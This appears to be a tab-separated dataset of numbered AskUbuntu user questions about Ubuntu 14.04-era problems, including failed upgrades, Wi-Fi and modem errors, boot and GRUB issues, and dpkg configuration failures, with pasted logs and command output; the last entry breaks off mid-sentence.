517775	hp mini upgrade from 12.04 to 13. ? ? failed	i have an hp mini 1030nr that was on 12.04 for about a year with no problems . a couple of days ago i checked for updates and version 13 was available to upgrade so i selected update . after it started and asked for root login , i left it to do something else . i forgot about it , and my daughter unplugged it , and it may not have finished updating before it died . now it is not working properly . it seemed fine at first , but it is not detecting the wifi chip , the setting screen opens but is blank , and it no longer asks for a password when it boots . can i try to install version 13 again or should i go back to 12.04 ?
517780	how do i stop skype from auto-launching	i have ubuntu 14.04 with cinnamon . when i login skype auto launches and i want to stop that . i looked in startup applications but can not find it .
517781	why wo n't vim source my .vimrc at startup ?	i have modified my ~/.vimrc significantly ( although some of my initial modifications i made in the system-wide /etc/vim/vimrc ) . it probably does n't matter either way since i am really the only user on my laptop , and certainly the only one who edits in vim . anyway , with the vim-latex package , files open with folds automatically inserted at sections and subsections of .tex documents . this is fine ( and useful once in a while ) as long as the folds are all open when i start . the following two lines seem to accomplish what i want when the .vimrc is sourced ! set foldmethod=syntax autocmd syntax tex normal zr my frustrating workaround has been to manually source .vimrc when i open a document to begin editing ( or at least invoking zr manually to open all the folds ) . my cascading question is : is there an environmental variable that i can set ( in my .bash_profile , say ) that tells vim to look for .vimrc in my home directory ? should n't this be the default ? how do i fix this ?
517782	how to add jenkins to apache group ?	i currently run an instance of ubuntu 14.04 lts . apache2 is installed jenkins is installed ( along with the jenkins linux user ) the problem i have , is that my custom site is in /etc/apache2/sites-available , and i 've gone ahead and done sudo a2ensite < site_name > which did n't complain . when i attempt to browse my site http : //mysite.here:8082 , i get a 500 error and nothing in the error.log to indicate what is wrong . do i need to turn up apache logging ? the files are under jenkins.jenkins and i worry they are not part of the www-data group ... do i need to add it ?
517785	is there a way to upgrade a node via maas or juju ?	is there a way to make the security upgrade or launch it of all nodes via maas or juju ? because to make that vm by vm it takes too long time .
517787	i can connect to a wireless network but it does n't work	so i 've been using a wireless network for a while , but recently it randomly decided to stop working . this is the problem : it connects to the network ( nm-tool says `` state : connected ( global ) '' ) but when i try to access a webpage it refuses to load it . in the system monitor in the network history it says that it does send and receive packets ( 0-1,5 kb/s ) and everything looks normal-ish . if i connect to this network with another device ( my iphone ) it works just fine and if i connect to another wireless network ( using my iphone as a wireless hotspot ) it works , this just happens with this network which is the only one fast enough for what i need it for . thanks in advance and sorry for my terrible english ( it 's not my first language ) . if you need the output of any command , just ask for it . additional info : -i 'm using an asus laptop running ubuntu 14.04 lts . -someone asked for the output of a script to diagnose what 's up ( sorry for the delay it 's hard to do anything without internet ) : http : //pastebin.com/xidq3yql
517791	i 'm not sure if lamp on my ubuntu 14.04.1 works correctly	i installed lamp on ubuntu 14.04.1 following this guide . however , when i go to http : //localhost/testing.php/ from the browser , all i get is this : not found the requested url /testing.php/ was not found on this server . apache/2.4.7 ( ubuntu ) server at localhost port 80 what to do ? : (
517794	ubuntu 14.04 stuck in login loop . nothing seems to help	just an hour ago , i installed some package which was supposed to solve the problem with dead keys . after that i restarted my laptop and could not log in because of infinite loop with the login page . i can use the user account but what can i do from it ? i can not access bios , booting from usb does not work . i tried to switch from gui to the shell str+alt+f3 and login in using my superuser credentials but sudo is not recognized in the shell . this is the error message i got : command â´sudoâ´ is available in /usr/bin/sudo this command cound not be located because /usr/bin is not included in the path environment variable . sudo command not found . im begging for help .
517795	how to show all windows like in the windows tab of windows task manager ?	how to show all windows like in the windows tab of windows task manager ? here is some extra text to bypass askubuntu 's quality filter .
517797	ubuntu 14.04 flash drive install not booting unless uefi	im trying to install ubuntu 14.04 ( x64 ) from a usb flash drive but it does n't boot unless the computer is in uefi mode and i 'm wondering if it is possible to install ubuntu in a computer that does n't support uefi
517800	hewlett packard keyboard 's spacebar not auto-typing	i 'm using an hp keyboard with a ps/2 port , and the spacebar functions normally when pressed , but does n't elicit a response when held . first , has this happened to anyone else ? second , if so , is there a way to fix it ? update : i 've tested every other key , and they all work normally .
517805	gedit embedded terminal not working	i get this error when i run gedit : $ gedit traceback ( most recent call last ) : file `` /usr/lib/x86_64-linux-gnu/gedit/plugins/terminal.py '' , line 309 , in do_activate self._panel = geditterminalpanel ( ) file `` /usr/lib/x86_64-linux-gnu/gedit/plugins/terminal.py '' , line 188 , in __init__ self.add_terminal ( ) file `` /usr/lib/x86_64-linux-gnu/gedit/plugins/terminal.py '' , line 191 , in add_terminal self._vte = geditterminal ( ) file `` /usr/lib/x86_64-linux-gnu/gedit/plugins/terminal.py '' , line 65 , in __init__ self.fork_command_full ( vte.ptyflags.default , none , [ vte.get_user_shell ( ) ] , none , glib.spawnflags.search_path , none , none ) gi._glib.gerror : failed to execute child process `` '' ( no such file or directory ) gedit opens but the embedded terminal does not appear when i open the bottom panel . does anyone know how to fix this ?
517806	how to fix file sharing that broke upgrading 12.04 to 14.04 ?	i was running 12.04 precise pangolin and sharing to my home network so that i could stream music and videos to my ouya . and it all worked flawlessly . then i upgraded to 14.04 trusty tahr and my ouya ca n't even find my laptop now . it still finds the windows machine just fine . i tried to remedy the situation by following others recommendations online . now when i right-click on a folder to share it the `` share '' option has completely disappeared . all i want to do is to be able to share to my home network without a password . how do i do this ?
517807	patch a package by adding new files to it ?	i 'm trying to patch an existing package , and my patch is supposed to change some files and add some files and directories to the package . all seems to work , the .patch file in debian/patches looks good , then i install the package using dpkg -i or from my ppa with apt-get . the problem is after install , the files that existed in the package before are patched correctly , but the new files the patch was supposed to add are not installed . they 're missing . i 'm trying to patch the package python-neutron . this is the process i 'm using : download the source : apt-get source neutron cd neutron-2014.1.2 make the patch : quilt new my-changes.patch quilt add setup.cfg # this file already existed in the package quilt add newfile # this file did not exist in the package echo `` change1 '' > > setup.cfg echo `` change2 '' > newfile quilt refresh increment the version : dch -i distribution trusty `` added my-changes.patch '' build the source package : debuild -s build the .deb packages : pbuilder-dist trusty create pbuilder-dist trusty build ../neutron_2014.1.2-0ubuntu.1.2.dsc install the package : sudo dpkg -i ~/pbuilder/trusty-result/python-neutron_2014.1.2-0ubuntu1.2_all.deb at the end of all this , the files are installed on my system , and setup.cfg has been correctly modified with 'change1 ' , but newfile does n't exist at all . i 've also tried using dpkg-source -- commit instead of calling quilt directly , but i get exactly the same results .
517808	keyboard behaving badly under load in lubuntu in firefox	i have a problem where my keyboard will stop working correctly in firefox . i am running 14.04 , on an older acer aspire one netbook . when the computer is under a bit of load , my typing in firefox will start to delay , completely pause for a brief moment , then resume but instead of typing the intended keys , it randomly begins typing only one of several characters , regardless of the key pressed . the characters that get repeated are always some of the characters i last typed before the typing delay and pause . space bar , return , delete , f keys , ctrl , alt , shift , arrows , etc . theyâre all affected . once this happens , the only cure is to restart firefox . what is weird is that in other programs , while this is happening in firefox , they behave perfectly correctly . abiword works fine , a terminal window works fine , but only the typing in firefox is incorrect . i would use chrome , but iâve noticed that when i use chrome , i randomly will lose all keyboard function and be forced to restart the browser . any idea what could be the problem ? i have no other keyboard layouts installed .
517811	unexpected system freezes	the title is pretty self-explanatory : every once in a while , my system ( 14.04 x64 ) freezes : the mouse is n't moving , reisub does nothing and all i can do is cut off the power supply . i guess this can be a hardware issue ( my computer has a long history of breaking , it 's like a curse ) , but i am a linux newbie and i do n't have any idea where to look . thanks in advance for help : )
517812	mouse problems over specific window on dual monitor	i am using a dual monitor setup with nouveau driver and everything is fine except for one thing : when my mouse is over the wolfram mathematica window , it becomes a white square with some rubbish on it . does any one know how to fix this ?
517813	ubuntu 14.04 : no longer connecting to wired connection	i recently upgraded my system from 12.04 to 14.04 and everything was working fine . however , one day it randomly stopped connecting to the wired connection . my wireless connection works fine , but if i disable wireless and attempt to connect to the wired , it keeps attempting to obtain an ip address without avail . when i run ifconfig , it shows no ip address for eth0 . any ideas on how to fix it ?
517816	ca n't install ubuntu 14.04 on my laptop	when i tried to install every time it show the message general error mounting filesystems . a maintenance shell will be started . control -d will terminate this shell and reboot the system . root @ ubuntu : ~ # i 'm trying to dual boot with windows 7 . i used wubi , xboot , usb installer for installing . everytime i got this . pc is an hp probook 440 g1 i5 .
517818	add a startup application in the background in ubuntugnome 14.04	i want transmission to startup when i login but would rather the window not pop up , i just want it to start minimized with it 's app indicator . how can i add transmission to my startup applications but enable it to start in the background ? thanks in advance
517820	how to start openvpn on boot ?	i am running ubuntu desktop 14.04 x64 . i have openvpn installed and a client.conf file in /etc/openvpn . however , openvpn does n't start on boot . i would try editing /etc/default/openvpn to make it autostart , however it needs a password for my private key file . is it possible to make it connect at startup , or do i need to switch to just certificates and no password ?
517821	how can i make sublime text 3 run as root from unity ?	i know i am not root because i can not browse packages . first , i am aware of this page , but it is not working for me . after following those instruction , i get the prompt when i open sublime from unity , but i am still not able to browse packages . if i open sublime using gksu subl in the terminal , nothing happens . if i do sudo subl it opens and i can browse packages . is it ok to open sublime as sudo every time instead of gksu ? edit : actually , when i open sublime from unity , it prompts for the password , then does n't open at all . edit : gksudo subl has the same effect as gksu . i installed sublime from the website ( clicked the ubuntu 64 link , it downloaded , clicked the download , it took me to software center ) . `` which subl '' returns /usr/bin/subl . gksu is installed . glutanimate , yes that is what i mean . any idea what is happening then ? i can only browse them if i use sudo . /usr/share/applications/sublime-text.desktop : [ desktop entry ] version=1.0 type=application name=sublime text genericname=text editor comment=sophisticated text editor for code , markup and prose exec=gksu /opt/sublime_text/sublime_text % f terminal=false mimetype=text/plain ; icon=sublime-text categories=texteditor ; development ; startupnotify=true actions=window ; document ; [ desktop action window ] name=new window exec=/opt/sublime_text/sublime_text -n onlyshowin=unity ; [ desktop action document ] name=new file exec=/opt/sublime_text/sublime_text -- command new_file onlyshowin=unity ;
517822	ubuntu no longer working : asking for drive cache failed	whenever i start my computer , everything works fine . i let it load , then i select the operating system . in this case , ubuntu . then , i get this message and it repeats hundreds of times and it does n't load the operating system ! it shows a low-res terminal and repeats the message , once every 30 or so seconds . : \ i lost alot of files and work , please help me . does this mean my drive was wiped ? i would like to fix this . please help me . here is the message : ( only once , not repeated alot . ) 3256.362200 ] sd 5:0:0:0 : [ sdb ] asking for cache data failed [ 3256.362200 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through it just says that and nothing loads or happens . : \ please help me i have important files that i thought were backed up , but ubuntu one was n't working for some reason . i think the last thing i did before it began this error is that i restarted my computer and i started it in advanced boot . then i selected something ( sorry about my lack of memory ) . it took sooooo long to load , so i held the power button down to force power off my computer ! did i break it ? d : thank you .
517824	changing environment variables	i just changed my /etc/environment file to : m2_home=/usr/local/apache-maven/apache-maven-3.1.1 m2= $ m2_home/bin path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games '' path= $ m2 : $ path java_home=/usr/local/jdk1.6.0_45 path= $ java_home : $ path ( trying to do something similar to this ) however , when i tried checking the environment variables by typing , for instance echo `` $ m2 '' , the result is an empty line for all the variables and $ path is the same as before editing the file . why did n't my changes operate ? i tried closing and opening the shell , but nothing happens .
517825	wine systray not working on unity ubutnu 14.04	the problem is that the wine systray is not working in my unity desktop on ubuntu 14.04 , any other apps for ubuntu ( skype , steam-ubuntu version- , transmission ) they work fine , just the wine systray is not appearing , i reseted unity , reintalled it , reinstalled wine and i cant make it work ) . 多can somebody teach me the solution ?
517827	problems with dell wireless 5570 hspa+ mobile broadband card ubuntu	i have problem with dell wireless 5570 hspa+ mobile broadband card on ubuntu 14.04 . here some debug output : modemmanager [ 3806 ] : < info > [ 1409355575.552118 ] [ mm-iface-modem-simple.c:641 ] connect_auth_ready ( ) : simple connect started ... modemmanager [ 3806 ] : < debug > [ 1409355575.552148 ] [ mm-iface-modem-simple.c:651 ] connect_auth_ready ( ) : pin : unspecified modemmanager [ 3806 ] : < debug > [ 1409355575.552159 ] [ mm-iface-modem-simple.c:653 ] connect_auth_ready ( ) : operator id : unspecified modemmanager [ 3806 ] : < debug > [ 1409355575.552167 ] [ mm-iface-modem-simple.c:655 ] connect_auth_ready ( ) : allowed roaming : yes modemmanager [ 3806 ] : < debug > [ 1409355575.552174 ] [ mm-iface-modem-simple.c:657 ] connect_auth_ready ( ) : apn : web.vodafone.de modemmanager [ 3806 ] : < debug > [ 1409355575.552182 ] [ mm-iface-modem-simple.c:665 ] connect_auth_ready ( ) : ip family : unspecified modemmanager [ 3806 ] : < debug > [ 1409355575.552189 ] [ mm-iface-modem-simple.c:673 ] connect_auth_ready ( ) : allowed authentication : unspecified modemmanager [ 3806 ] : < debug > [ 1409355575.552200 ] [ mm-iface-modem-simple.c:675 ] connect_auth_ready ( ) : user : unspecified modemmanager [ 3806 ] : < debug > [ 1409355575.552208 ] [ mm-iface-modem-simple.c:677 ] connect_auth_ready ( ) : password : unspecified modemmanager [ 3806 ] : < debug > [ 1409355575.552214 ] [ mm-iface-modem-simple.c:679 ] connect_auth_ready ( ) : number : *99 # modemmanager [ 3806 ] : < info > [ 1409355575.552220 ] [ mm-iface-modem-simple.c:461 ] connection_step ( ) : simple connect state ( 3/8 ) : enable modemmanager [ 3806 ] : < info > [ 1409355575.552245 ] [ mm-iface-modem.c:1203 ] __iface_modem_update_state_internal ( ) : modem /org/freedesktop/modemmanager1/modem/0 : state changed ( disabled - > enabling ) modemmanager [ 3806 ] : < debug > [ 1409355575.552398 ] [ mm-broadband-modem.c:7899 ] enabling_started ( ) : skipping modem initialization : not required modemmanager [ 3806 ] : < debug > [ 1409355575.552426 ] [ mm-broadband-modem-qmi.c:8363 ] parent_enabling_started_ready ( ) : could n't start parent enabling : could n't open ports during modem enabling : could n't get primary port modemmanager [ 3806 ] : < debug > [ 1409355575.552443 ] [ mm-broadband-modem-qmi.c:2650 ] load_power_state ( ) : getting device operating mode ... modemmanager [ 3806 ] : [ /dev/cdc-wdm0 ] sent message ... < < < < < < raw : < < < < < < length = 13 < < < < < < data = 01:0c:00:00:02:08:00:1a:00:2d:00:00:00 modemmanager [ 3806 ] : [ /dev/cdc-wdm0 ] sent message ( translated ) ... < < < < < < qmux : < < < < < < length = 12 < < < < < < flags = 0x00 < < < < < < service = `` dms '' < < < < < < client = 8 < < < < < < qmi : < < < < < < flags = `` none '' < < < < < < transaction = 26 < < < < < < tlv_length = 0 < < < < < < message = `` get operating mode '' ( 0x002d ) modemmanager [ 3806 ] : [ /dev/cdc-wdm0 ] received message ... > > > > > > raw : > > > > > > length = 24 > > > > > > data = 01:17:00:80:02:08:02:1a:00:2d:00:0b:00:02:04:00:00:00:00:00:01:01:00:01 modemmanager [ 3806 ] : [ /dev/cdc-wdm0 ] received message ( translated ) ... > > > > > > qmux : > > > > > > length = 23 > > > > > > flags = 0x80 > > > > > > service = `` dms '' > > > > > > client = 8 > > > > > > qmi : > > > > > > flags = `` response '' > > > > > > transaction = 26 > > > > > > tlv_length = 11 > > > > > > message = `` get operating mode '' ( 0x002d ) > > > > > > tlv : > > > > > > type = `` result '' ( 0x02 ) > > > > > > length = 4 > > > > > > value = 00:00:00:00 > > > > > > translated = success > > > > > > tlv : > > > > > > type = `` mode '' ( 0x01 ) > > > > > > length = 1 > > > > > > value = 01 > > > > > > translated = low-power modemmanager [ 3806 ] : < debug > [ 1409355575.593712 ] [ mm-broadband-modem-qmi.c:2536 ] common_power_up_down ( ) : setting device operating mode ... modemmanager [ 3806 ] : [ /dev/cdc-wdm0 ] sent message ... < < < < < < raw : < < < < < < length = 17 < < < < < < data = 01:10:00:00:02:08:00:1b:00:2e:00:04:00:01:01:00:00 modemmanager [ 3806 ] : [ /dev/cdc-wdm0 ] sent message ( translated ) ... < < < < < < qmux : < < < < < < length = 16 < < < < < < flags = 0x00 < < < < < < service = `` dms '' < < < < < < client = 8 < < < < < < qmi : < < < < < < flags = `` none '' < < < < < < transaction = 27 < < < < < < tlv_length = 4 < < < < < < message = `` set operating mode '' ( 0x002e ) < < < < < < tlv : < < < < < < type = `` mode '' ( 0x01 ) < < < < < < length = 1 < < < < < < value = 00 < < < < < < translated = online modemmanager [ 3806 ] : [ /dev/cdc-wdm0 ] received message ... > > > > > > raw : > > > > > > length = 20 > > > > > > data = 01:13:00:80:02:08:02:1b:00:2e:00:07:00:02:04:00:01:00:03:00 modemmanager [ 3806 ] : [ /dev/cdc-wdm0 ] received message ( translated ) ... > > > > > > qmux : > > > > > > length = 19 > > > > > > flags = 0x80 > > > > > > service = `` dms '' > > > > > > client = 8 > > > > > > qmi : > > > > > > flags = `` response '' > > > > > > transaction = 27 > > > > > > tlv_length = 7 > > > > > > message = `` set operating mode '' ( 0x002e ) > > > > > > tlv : > > > > > > type = `` result '' ( 0x02 ) > > > > > > length = 4 > > > > > > value = 01:00:03:00 > > > > > > translated = failure : internal modemmanager [ 3806 ] : < info > [ 1409355575.625779 ] [ mm-iface-modem.c:1203 ] __iface_modem_update_state_internal ( ) : modem /org/freedesktop/modemmanager1/modem/0 : state changed ( enabling - > disabled ) and networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) starting connection 'vodafone default 1' networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] networkmanager [ 4081 ] : < info > networkmanager state is now connecting networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) stage 1 of 5 ( device prepare ) scheduled ... networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) stage 1 of 5 ( device prepare ) started ... networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) stage 1 of 5 ( device prepare ) complete . networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) modem state changed , 'disabled ' -- > 'enabling ' ( reason : user-requested ) networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) modem state changed , 'enabling ' -- > 'disabled ' ( reason : unknown ) networkmanager [ 4081 ] : < warn > ( cdc-wdm0 ) failed to connect modem : could n't set operating mode : qmi protocol error ( 3 ) : 'internal' networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : device state change : prepare - > failed ( reason 'unknown ' ) [ 40 120 1 ] networkmanager [ 4081 ] : < info > networkmanager state is now disconnected networkmanager [ 4081 ] : < warn > activation ( cdc-wdm0 ) failed for connection 'vodafone default 1' networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : deactivating device ( reason 'none ' ) [ 0 ] networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) starting connection 'vodafone default 1' networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] networkmanager [ 4081 ] : < info > networkmanager state is now connecting networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) stage 1 of 5 ( device prepare ) scheduled ... networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) stage 1 of 5 ( device prepare ) started ... networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) stage 1 of 5 ( device prepare ) complete . networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) modem state changed , 'disabled ' -- > 'enabling ' ( reason : user-requested ) networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) modem state changed , 'enabling ' -- > 'disabled ' ( reason : unknown ) networkmanager [ 4081 ] : < warn > ( cdc-wdm0 ) failed to connect modem : could n't set operating mode : qmi protocol error ( 3 ) : 'internal' networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : device state change : prepare - > failed ( reason 'unknown ' ) [ 40 120 1 ] networkmanager [ 4081 ] : < info > networkmanager state is now disconnected networkmanager [ 4081 ] : < warn > activation ( cdc-wdm0 ) failed for connection 'vodafone default 1' networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : deactivating device ( reason 'none ' ) [ 0 ] networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) starting connection 'vodafone default 1' networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] networkmanager [ 4081 ] : < info > networkmanager state is now connecting networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) stage 1 of 5 ( device prepare ) scheduled ... networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) stage 1 of 5 ( device prepare ) started ... networkmanager [ 4081 ] : < info > activation ( cdc-wdm0 ) stage 1 of 5 ( device prepare ) complete . networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) modem state changed , 'disabled ' -- > 'enabling ' ( reason : user-requested ) networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) modem state changed , 'enabling ' -- > 'disabled ' ( reason : unknown ) networkmanager [ 4081 ] : < warn > ( cdc-wdm0 ) failed to connect modem : could n't set operating mode : qmi protocol error ( 3 ) : 'internal' networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : device state change : prepare - > failed ( reason 'unknown ' ) [ 40 120 1 ] networkmanager [ 4081 ] : < info > networkmanager state is now disconnected networkmanager [ 4081 ] : < info > marking connection 'vodafone default 1 ' invalid . networkmanager [ 4081 ] : < warn > activation ( cdc-wdm0 ) failed for connection 'vodafone default 1' networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] networkmanager [ 4081 ] : < info > ( cdc-wdm0 ) : deactivating device ( reason 'none ' ) [ 0 ] any idea ?
517830	let utransmission run even after lid closed ?	how do i set my settings such that even if i close my lid ( laptop ) my downloads do n't stop or pause in utransmission i have set the setting in power options to not suspend after closing lid still does n't have time out is off as well in power option but this does n't help also wifi goes off when i close the lid . i just want my torrents running even if i close the lid or keep the laptop untouched for a long time
517839	unable to find windows8.1 boot option after installing ubuntu	i know you guys might think there are many posts already related to the same topic . i went through almost all the posts , tried to work all possible solutions and nothing was fruitful . my problem is , i got a laptop preloaded with windows 8 . i upgraded it to 8.1 and wanted to install ubuntu as well . i had a 80gb unused space and while installing ubuntu i selected this space to install . installation was successful but when i restarted the machine , i was unable to find windows boot option . ubuntu was installed in uefi and windows i am not sure . then after reading through many posts to fix it , i downloaded boot-repair and ran it to fix the problem , but there was no improvement . then i tried many things and finally decided to uninstall ubuntu and re-install it . i used the same usb drive installation and during installation , i selected uninstall and re-install option . but again nothing worked . then i tried to remove the partition using gparted after logging in the option `` try ubuntu without installation '' . here i selected the linux-partition and deleted it and formatted it to ntfs . then after restart , surprisingly ubuntu is still there and i can login , but there is no windows option . i have some important data on the other partitions , and need to get windows back online . to my bad luck ( or sheer dumbness ) i do n't have a recovery manager disk or on usb drive to atleast have other options . how do you suggest i should approach this problem .
517840	why can i not install iptables ?	linux newbie seeks help please ! i 've set up a vps as a mail server using dovecot and postfix and i 'm trying to install iptables to secure the box a bit more however when i do i get the following error ... does anyone else have experience of this or know how to fix it please ? many thanks ! root @ mail : ~ # apt-get install iptables-persistent reading package lists ... done building dependency tree reading state information ... done iptables-persistent is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up iptables-persistent ( 0.5.3ubuntu2 ) ... dpkg : error processing iptables-persistent ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : iptables-persistent e : sub-process /usr/bin/dpkg returned an error code ( 1 )
517844	why is my cpu frequency stuck ?	after recent routine upgrades , i 've noticed that i 'm unable to change my cpu frequency manually . the system is doing it automatically , and choosing the highest frequency possible , which causes it to run hot ( it already has heating issues ) . most of the fixes i found are on threads from 2010 or earlier , and are no longer applicable . here is the output of cpufreq-info : cpufrequtils 008 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 10.0 us . hardware limits : 800 mhz - 1.80 ghz available frequency steps : 1.80 ghz , 1.80 ghz , 1.20 ghz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 1.80 ghz and 1.80 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 1.80 ghz . cpufreq stats : 1.80 ghz:77.10 % , 1.80 ghz:0.01 % , 1.20 ghz:22.86 % , 800 mhz:0.02 % ( 74 ) analyzing cpu 1 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 1 cpus which need to have their frequency coordinated by software : 1 maximum transition latency : 10.0 us . hardware limits : 800 mhz - 1.80 ghz available frequency steps : 1.80 ghz , 1.80 ghz , 1.20 ghz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 1.80 ghz and 1.80 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 1.80 ghz . cpufreq stats : 1.80 ghz:77.09 % , 1.80 ghz:0.02 % , 1.20 ghz:22.88 % , 800 mhz:0.02 % ( 73 ) the output of cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq : 1801000
517845	grub loading error after partition during booting	i have error during boot after partition of laptop . it have window xp and ubuntu 9.04 os . grub loading stage1.5 grub loading please wait error 17 device boot start end system /dev/sda1 1 2582 hpfs/ntfs /dev/sda2 6854 7296 hidden w95 fat32 ( lba ) /dev/sda3 2853 6853 w95 ext 'd ( lba ) /dev/sda5 5518 5779 linux swap /dev/sda6 2853 5517 w95 fat32 /dev/sda7 5780 6853 linux please help me to sort this out .
517847	external hard drive wo n't mount on ubuntu ; previous solutions did not work	my 4 tb seagate bup fast hdd wo n't mount on my laptop , but it works fine on my grandma 's ubuntu computer and my friend 's pc . it is recognized in disks , but wo n't mount , even when i tried the solutions listed here . disks is telling me that partition 2 ( /dev/sdc2 ) is `` mounted at /mnt '' , but i do n't see it anywhere . i 'm not sure what to do . edit1 : add output of blkid sudo blkid -c /dev/null /dev/sda1 : uuid= '' d4dd2f23-0638-4364-a0aa-a24d0098ce46 '' type= '' ext2 '' /dev/sda5 : uuid= '' np8qmg-n13f-nstd-t2dy-0hb2-send-iiwyku '' type= '' lvm2_member '' /dev/mapper/ubuntu -- vg-root : uuid= '' 1724975b-e000-44f5-a077-1b9ef5fce1e0 '' type= '' ext4 '' /dev/mapper/ubuntu -- vg-swap_1 : uuid= '' 2882828f-b45b-4899-941f-d68a54cdfbfa '' type= '' swap '' /dev/sdb1 : sec_type= '' msdos '' uuid= '' 3537-6261 '' type= '' vfat '' edit2 : added output of sudo parted -l model : ata wdc wd5000bpvt-2 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 256mb 255mb primary ext2 boot 2 257mb 500gb 500gb extended 5 257mb 500gb 500gb logical lvm model : generic- multi-card ( scsi ) disk /dev/sdb : 2033mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 127kb 2031 mb 2031 mb primary fat16 error : /dev/sdd : unrecognized disk label warning : error fsyncing/closing /dev/sdd : input/output error retry/ignore ?
517852	mounting wd mybook as network share	how do i mount a mybook 2tb drive so it can be accessed from my network ? machine is hp sff w/ amd athalon ii x2 b24 proc.,4gb ram , kde4.13 kernal 3.13.0-35 , 32 bit
517854	display issue when opening firefox - 32-bit vs 64 bit	i have a toshiba satellite c655d-s5300 that i originally installed the 64-bit version of 13.10 on . ocasionally , when i opened firefox the screen would get blurry with colored lines quickly moving back and forth . this only happened when i opened the web browser . it was fine otherwise . over time and updates , this resolved itself . when i upgraded to 14.04.01 the problem returned and became consistent : open firefox , display issue starts , but now every single time . this machine has a amd radeon hd 6310 video card . i first tried switching the display driver from fglrx and to the one from x.org . same issue . then i did a clean install of 13.10 using the x86 32-bit version . this works fine , i can open up the browser without issue . but i really do want a 64-bit version and the toshiba should be able to handle this . so i did another clean install of 13.10 using the amd64- for-pc version and the problem is back . anyone have any idea what the difference is in display driver between the 32- and 64-bit versions ? there must be a way to get the 64-bit version to work , as it did in some later 13.10 upgrade . any ideas of how to resolve this ?
517857	dpkg : error processing package linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured	dpkg -- configure -a setting up linux-image-3.13.0-35-generic ( 3.13.0-35.62 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.13.0-35-generic vmlinuz ( /boot/vmlinuz-3.13.0-35-generic ) points to /boot/vmlinuz-3.13.0-35-generic ( /boot/vmlinuz-3.13.0-35-generic ) -- doing nothing at /var/lib/dpkg/info/linux-image-3.13.0-35-generic.postinst line 491 . examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.0-35-generic /boot/vmlinuz-3.13.0-35-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.0-35-generic /boot/vmlinuz-3.13.0-35-generic update-initramfs : generating /boot/initrd.img-3.13.0-35-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.13.0-35-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.13.0-35-generic.postinst line 1025. dpkg : error processing package linux-image-3.13.0-35-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-extra-3.13.0-35-generic : linux-image-extra-3.13.0-35-generic depends on linux-image-3.13.0-35-generic ; however : package linux-image-3.13.0-35-generic is not configured yet . dpkg : error processing package linux-image-extra-3.13.0-35-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.13.0-35-generic ; however : package linux-image-3.13.0-35-generic is not configured yet . linux-image-generic depends on 